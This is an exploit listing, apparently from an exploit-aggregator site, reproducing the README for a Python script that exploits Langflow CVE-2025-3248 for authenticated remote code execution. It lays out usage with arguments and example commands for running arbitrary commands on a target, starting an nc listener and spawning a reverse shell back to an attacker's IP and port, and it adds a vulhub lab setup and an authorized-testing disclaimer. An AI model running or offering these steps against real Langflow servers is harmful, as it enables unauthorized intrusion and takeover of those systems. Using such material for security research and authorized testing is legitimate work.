Exploit for Code Injection in Langflow CVE-2025-3248

Name: Exploit for Code Injection in Langflow CVE-2025-3248
Rating: 5 (162 reviews)
2025-05-31 | CVSS 9.8
## https://sploitus.com/exploit?id=D5C2C4F9-735B-50DB-A4A1-C34A555D8C5D
# Authenticated CVE-2025-3248 Langflow Remote Code Execution

This Python script exploits **CVE-2025-3248** to execute arbitrary commands or spawn a reverse shell on a vulnerable system.
**Authentication is required** to use this exploit.

---

## Features

- **Authenticated Command Execution:** Run arbitrary system commands on the target.
- **Reverse Shell:** Spawn a reverse shell to your listener.
- **Proxy Support:** Route requests through a proxy (e.g., Burp Suite).

---

## Requirements

- Python 3.x
- `requests` library

Install dependencies with:

```bash
pip install requests
```

---

## Usage

```bash
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
```

### Arguments

| Argument         | Description                                      | Required |
|------------------|--------------------------------------------------|----------|
| `-u`, `--url`    | Target base URL (e.g., `https://target.com`)     | Yes      |
| `-l`, `--login`  | Admin username                                   | Yes      |
| `-p`, `--password` | Admin password                                 | Yes      |
| `-c`, `--command`| Command to execute on the target                 | No*      |
| `--proxy`        | Proxy URL (e.g., `http://127.0.0.1:8080`)        | No       |
| `--lhost`        | Local host for reverse shell                     | No*      |
| `--lport`        | Local port for reverse shell                     | No*      |

\* You must specify either a command (`-c`) or both `--lhost` and `--lport` for a reverse shell.

---

### Examples

#### 1. Execute a Command

```bash
python3 exploit.py -u https://target.com -l admin -p password -c "id"
```

#### 2. Get a Reverse Shell

Start a listener on your machine:

```bash
nc -lvnp 4444
```

Then run:

```bash
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
```

#### 3. Use a Proxy

```bash
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
```

---

## Docker image

### Deploying the image

You can deploy the Docker image using the following command:

```bash
podman compose up -d
```

The image will be available at `http://localhost:7860`.
Credits for the compose file: [This repository](https://github.com/vulhub/vulhub/tree/master/langflow/CVE-2025-3248)

---

## Disclaimer

This script is for **educational and authorized penetration testing** purposes only.
**Do not use against systems you do not own or have explicit permission to test.**

---

This readme is AI generated.